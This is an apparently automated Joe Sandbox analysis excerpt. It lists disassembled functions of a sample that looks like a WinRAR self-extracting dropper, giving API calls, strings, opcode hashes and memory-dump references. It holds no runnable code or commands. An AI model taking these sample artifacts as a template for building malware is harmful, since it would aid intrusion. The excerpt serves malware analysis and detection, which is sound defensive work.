                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$CurrentProcess
                                                              • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                              • API String ID: 2190909847-396321323
                                                              • Opcode ID: b4d06e30917bb47d3e2b425e4f983a66d340c7e142276b61eb756f5242ac750c
                                                              • Instruction ID: 27c8c7a8f639d34e9d9625f77cf8840ab718ba3cdf3a732e56ad2a7f1a335764
                                                              • Opcode Fuzzy Hash: b4d06e30917bb47d3e2b425e4f983a66d340c7e142276b61eb756f5242ac750c
                                                              • Instruction Fuzzy Hash: E61124316016286BDB115F21D8016AE3714FF40B21B10416BFC116B292DF78DD86879D
                                                              Function 0042101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateThread.KERNEL32(00000000,00010000,00421160,?,00000000,00000000), ref: 00421043
                                                              • SetThreadPriority.KERNEL32(?,00000000), ref: 0042108A
                                                                • Part of subcall function 00416C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00416C54
                                                                • Part of subcall function 00416DCB: _wcschr.LIBVCRUNTIME ref: 00416E0A
                                                                • Part of subcall function 00416DCB: _wcschr.LIBVCRUNTIME ref: 00416E19
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: Thread_wcschr$CreatePriority__vswprintf_c_l
                                                              • String ID: CreateThread failed
                                                              • API String ID: 2706921342-3849766595
                                                              • Opcode ID: 6219a5ca331515c507194e64f8021582098ae3bcf9fbddd01068968b6d6a5fe7
                                                              • Instruction ID: a3469e8cce9f401d15b981b951b8f722741c7af6e65226fb65a206804a8b9ecf
                                                              • Opcode Fuzzy Hash: 6219a5ca331515c507194e64f8021582098ae3bcf9fbddd01068968b6d6a5fe7
                                                              • Instruction Fuzzy Hash: A60126B53003196BE3345F64BC41BB673A8EB50B52F20002FFA82526D1CEA8A884822C
                                                              Function 0041C058 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: _wcschr
                                                              • String ID: <9D$?*<>|"
                                                              • API String ID: 2691759472-961402769
                                                              • Opcode ID: 72f0190cef2851e0c2a990776a2c4d4e4cda4224931d0f9c34b005aca9e05e6a
                                                              • Instruction ID: a50818a120acf80c04d4180d056c4acb67fb8d4f874609fcacdb218ecc612173
                                                              • Opcode Fuzzy Hash: 72f0190cef2851e0c2a990776a2c4d4e4cda4224931d0f9c34b005aca9e05e6a
                                                              • Instruction Fuzzy Hash: 08F0D6675C5701C1D7305EA45C417B3B7E4DF99720F34081FE5C8873C2E6A988C0825E
                                                              Function 0042DB4B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: _wcslen
                                                              • String ID: Software\WinRAR SFX$B
                                                              • API String ID: 176396367-577672339
                                                              • Opcode ID: 34992c754cd95bf6ef68b125793daa7d08c1d794698e119ce5af93bbc0232127
                                                              • Instruction ID: 5a3918145096710df5c2fe1b67596ebb00c88007a25032d913ec651dcca3a7bb
                                                              • Opcode Fuzzy Hash: 34992c754cd95bf6ef68b125793daa7d08c1d794698e119ce5af93bbc0232127
                                                              • Instruction Fuzzy Hash: AF018431900168BAEB219F91EC0AFDF7F7CEB05795F400067B50AE1061D7B49A98D7A5
                                                              Function 0042AE2F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0041C29A: _wcslen.LIBCMT ref: 0041C2A2
                                                                • Part of subcall function 00421FDD: _wcslen.LIBCMT ref: 00421FE5
                                                                • Part of subcall function 00421FDD: _wcslen.LIBCMT ref: 00421FF6
                                                                • Part of subcall function 00421FDD: _wcslen.LIBCMT ref: 00422006
                                                                • Part of subcall function 00421FDD: _wcslen.LIBCMT ref: 00422014
                                                                • Part of subcall function 00421FDD: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0041B371,?,?,00000000,?,?,?), ref: 0042202F
                                                                • Part of subcall function 0042AC04: SetCurrentDirectoryW.KERNELBASE(?,0042AE72,C:\Users\user\Desktop,00000000,0045946A,00000006), ref: 0042AC08
                                                              • _wcslen.LIBCMT ref: 0042AE8B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$CompareCurrentDirectoryString
                                                              • String ID: <B$C:\Users\user\Desktop
                                                              • API String ID: 521417927-759115840
                                                              • Opcode ID: b1a2db0e530c313ec47285e72d194fc18726eef3a5ac00f5a9153ecb1219fe4b
                                                              • Instruction ID: b20332d00ccb1bfda5a0a7dc77e9a7a06b0c861b64836c958e0a7b6f98734fb9
                                                              • Opcode Fuzzy Hash: b1a2db0e530c313ec47285e72d194fc18726eef3a5ac00f5a9153ecb1219fe4b
                                                              • Instruction Fuzzy Hash: 36017971D4022856DF10ABA5ED07EDF73FCAF09705F40046BF905E3192E6BC9654CA99
                                                              Function 0043BB4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004397E5: GetLastError.KERNEL32(?,00451030,00434674,00451030,?,?,00433F73,00000050,?,00451030,00000200), ref: 004397E9
                                                                • Part of subcall function 004397E5: _free.LIBCMT ref: 0043981C
                                                                • Part of subcall function 004397E5: SetLastError.KERNEL32(00000000,?,00451030,00000200), ref: 0043985D
                                                                • Part of subcall function 004397E5: _abort.LIBCMT ref: 00439863
                                                              • _abort.LIBCMT ref: 0043BB80
                                                              • _free.LIBCMT ref: 0043BBB4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast_abort_free
                                                              • String ID: pD
                                                              • API String ID: 289325740-1597287149
                                                              • Opcode ID: 970484987ffea0a3b55c78ba6c0c2a07ae4c00110337d46de2e898626b623c90
                                                              • Instruction ID: c9cc3a8332ca00e43b71868249b9b980f9b3ec96136e922c1af331d3a5720910
                                                              • Opcode Fuzzy Hash: 970484987ffea0a3b55c78ba6c0c2a07ae4c00110337d46de2e898626b623c90
                                                              • Instruction Fuzzy Hash: 05017C35D01622DBCA21AF5A940121AF760FB0CB24F14111FEA6467691CF6C7D018BCD
                                                              Function 0042B425 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: Malloc
                                                              • String ID: (B$ZB
                                                              • API String ID: 2696272793-4289898920
                                                              • Opcode ID: caef7c39e3fa9752900b3beb1b59f59e2d578df34b1d920bf668e7207143b43d
                                                              • Instruction ID: b937d53cb01036936d70c8a62176c10914d6b7c8d701f90a752cb8a571e60aa5
                                                              • Opcode Fuzzy Hash: caef7c39e3fa9752900b3beb1b59f59e2d578df34b1d920bf668e7207143b43d
                                                              • Instruction Fuzzy Hash: 6C016D76600118FF9F059FB0DC49CEE7B6DFF043457000165B906D7120E731AA44EBA4
                                                              Function 00438268 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0043BF30: GetEnvironmentStringsW.KERNEL32 ref: 0043BF39
                                                                • Part of subcall function 0043BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0043BF5C
                                                                • Part of subcall function 0043BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0043BF82
                                                                • Part of subcall function 0043BF30: _free.LIBCMT ref: 0043BF95
                                                                • Part of subcall function 0043BF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0043BFA4
                                                              • _free.LIBCMT ref: 004382AE
                                                              • _free.LIBCMT ref: 004382B5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                              • String ID: 0"G
                                                              • API String ID: 400815659-2485169809
                                                              • Opcode ID: 31233d6335da3d2a68e33e4f1f0c73d4bb1dadd9ec2b328e4195d6f6bb22a741
                                                              • Instruction ID: b2716260a3a4d3d8c145a88adad3d4f139b31e7d922ea7758a0257c6082fe6db
                                                              • Opcode Fuzzy Hash: 31233d6335da3d2a68e33e4f1f0c73d4bb1dadd9ec2b328e4195d6f6bb22a741
                                                              • Instruction Fuzzy Hash: 42E0E523605B42419261323B3C0276F46108B9D33CF25329FF624C61C3CE5C880304AF
                                                              Function 00420FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WaitForSingleObject.KERNEL32(?,000000FF,00421206,?), ref: 00420FEA
                                                              • GetLastError.KERNEL32(?), ref: 00420FF6
                                                                • Part of subcall function 00416C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00416C54
                                                              Strings
                                                              • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00420FFF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                              • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                              • API String ID: 1091760877-2248577382
                                                              • Opcode ID: 704461c3f4b97e885e4f63329fcad2f406670b6489c1b353225bfc6612b2012a
                                                              • Instruction ID: c1f18584ac6325994d4bb1a4683e9332b22773a7ed27945bebb4e916807a6e40
                                                              • Opcode Fuzzy Hash: 704461c3f4b97e885e4f63329fcad2f406670b6489c1b353225bfc6612b2012a
                                                              • Instruction Fuzzy Hash: FED02B3160453036D6203B286D06EAF38149B62B37B61071AF538516F6CB1C49C152DD
                                                              Function 0041E29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,0041DA55,?), ref: 0041E2A3
                                                              • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0041DA55,?), ref: 0041E2B1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: FindHandleModuleResource
                                                              • String ID: RTL
                                                              • API String ID: 3537982541-834975271
                                                              • Opcode ID: adb9ffc9a253c35693416cb8b517fd2e5ccc8f998fcac2790132601a2e7a7631
                                                              • Instruction ID: 380a6a24282aff94e225e8ab13bd8826787e534fabb888c60f33d9eff21f3e09
                                                              • Opcode Fuzzy Hash: adb9ffc9a253c35693416cb8b517fd2e5ccc8f998fcac2790132601a2e7a7631
                                                              • Instruction Fuzzy Hash: E9C01235240B1066EB341F657C0DF836A585B01F53F150559B541E92D5D6A9C98086A8
                                                              Function 0042E455 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E467
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: UB$zB
                                                              • API String ID: 1269201914-197499224
                                                              • Opcode ID: de2f98e33b0333b7aa37a7f46ea70d18fe70b9555832f43ef0b04fd259cb00c2
                                                              • Instruction ID: 745022721773b77e550f90e801aa3e5f5aca381550ba75ee184af00fd4f5fa95
                                                              • Opcode Fuzzy Hash: de2f98e33b0333b7aa37a7f46ea70d18fe70b9555832f43ef0b04fd259cb00c2
                                                              • Instruction Fuzzy Hash: 9CB012D53590607C310431133D02C37420CC0C2F91371C12FF604C0086E94C0E02147F
                                                              Function 0042E470 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E467
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: pB$zB
                                                              • API String ID: 1269201914-4228823757
                                                              • Opcode ID: 2473db9d21a89573b0c46edd2a1baeccf1743c739e65d030a60589eb2252d2d0
                                                              • Instruction ID: b5a339c0e49669b5a6d5ab82ef231b597e6ba394c2778a7afc34d4c098b8234a
                                                              • Opcode Fuzzy Hash: 2473db9d21a89573b0c46edd2a1baeccf1743c739e65d030a60589eb2252d2d0
                                                              • Instruction Fuzzy Hash: 80B012C535A090BC3144B1173C02D37020CC0C1BD1371C12FF848C1081E94C4C01143F

                                                              Executed Functions

                                                              Function 00007FF848D90D47 Relevance: 1.5, Strings: 1, Instructions: 273COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2429704239.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848d90000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 5Z_H
                                                              • API String ID: 0-3267294416
                                                              • Opcode ID: 299ab54470b8e36b608eb7aee86c744026b7f2b1e236cd720c78ea1c4b99a045
                                                              • Instruction ID: b918256914ee9ab6f6ab21099683c2892041ffcadaadb6b3def1ca66054fbc2a
                                                              • Opcode Fuzzy Hash: 299ab54470b8e36b608eb7aee86c744026b7f2b1e236cd720c78ea1c4b99a045
                                                              • Instruction Fuzzy Hash: 4FA10575D1DA899FE749EB6888293B97FE1FB59354F4000BAC049D72D2CF781809C751
                                                              Function 00007FF8494EA167 Relevance: 5.1, Strings: 4, Instructions: 123COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: X.WI$X.WI$X.WI$X.WI
                                                              • API String ID: 0-3047802772
                                                              • Opcode ID: f7756bdd47b0e95511f3015702b95b9e94cf726231d5e0ec6eaa8be558652bd0
                                                              • Instruction ID: 16f927e3ba1f365a0daa42fb9e4d13324adc6166964d4ea6be5ee4f04777d000
                                                              • Opcode Fuzzy Hash: f7756bdd47b0e95511f3015702b95b9e94cf726231d5e0ec6eaa8be558652bd0
                                                              • Instruction Fuzzy Hash: 8C414A31A0C9598FDF98EF29D495EB4B3E1FB68320B1401ADD40AD3692DF35E885CB81
                                                              Function 00007FF8494EA211 Relevance: 5.1, Strings: 4, Instructions: 118COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: X.WI$X.WI$X.WI$X.WI
                                                              • API String ID: 0-3047802772
                                                              • Opcode ID: 45d40f9b4e19500000185476a679c69e916470478e9f0c8e72ada34a199f387e
                                                              • Instruction ID: d9285a330410814b9f756e6ac3504a218a5f74f5182e31f1de7b84a7ac84f4dd
                                                              • Opcode Fuzzy Hash: 45d40f9b4e19500000185476a679c69e916470478e9f0c8e72ada34a199f387e
                                                              • Instruction Fuzzy Hash: 07314A31A089958FDF98EF29C495EB477E1FB68310B1406ADD40AC7696CF35E885CB81
                                                              Function 00007FF8494EA1AB Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: X.WI$X.WI$X.WI$X.WI
                                                              • API String ID: 0-3047802772
                                                              • Opcode ID: 6a94bf1ab4da34ae19b54232430dc1a8836aa1d15d6a03f1320e8df2e913ec5b
                                                              • Instruction ID: 5cc94d3413c7698e0b81699902efaebd157cdb76e0db40730ad227e1cb5d742a
                                                              • Opcode Fuzzy Hash: 6a94bf1ab4da34ae19b54232430dc1a8836aa1d15d6a03f1320e8df2e913ec5b
                                                              • Instruction Fuzzy Hash: 0F316D31A0C9998FDF98EF29C495EB473E1FB68310B1405ADD40AD7692CF35E885CB81
                                                              Function 00007FF8494E8888 Relevance: 4.0, Strings: 3, Instructions: 209COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $X.WI$xINI
                                                              • API String ID: 0-3297095233
                                                              • Opcode ID: 36b4b38153292db1d0f97f6b1cdd0d5fb828d2fca7876f753314487d3f9be5e4
                                                              • Instruction ID: 33b22e7ef32ae19ccb6066c032e160c1bf0a7fbe6fa5e012a3439fcc3e3b1c86
                                                              • Opcode Fuzzy Hash: 36b4b38153292db1d0f97f6b1cdd0d5fb828d2fca7876f753314487d3f9be5e4
                                                              • Instruction Fuzzy Hash: D971AE30D0C68E9FEF68EFA8C8556BDBBB1FF55350F1040AAD409E7282DA386941CB51
                                                              Function 00007FF8494E0C18 Relevance: 3.9, Strings: 3, Instructions: 157COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $`MI$`MI
                                                              • API String ID: 0-740844305
                                                              • Opcode ID: 050e2c6ae2f7f7ff6442cc17c279e812cece6638d83057ffb19fd6ade0ac78fc
                                                              • Instruction ID: 56a6346c8390a79b3728a3e45c72db96e87d048fa510c00f9fa6959384fb0187
                                                              • Opcode Fuzzy Hash: 050e2c6ae2f7f7ff6442cc17c279e812cece6638d83057ffb19fd6ade0ac78fc
                                                              • Instruction Fuzzy Hash: B1514C70D0C68E9FDB69EFA8C4656BDB7B1FF58340F1041BEC01AA7686CA386941CB51
                                                              Function 00007FF8494E5D77 Relevance: 2.8, Strings: 2, Instructions: 309COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
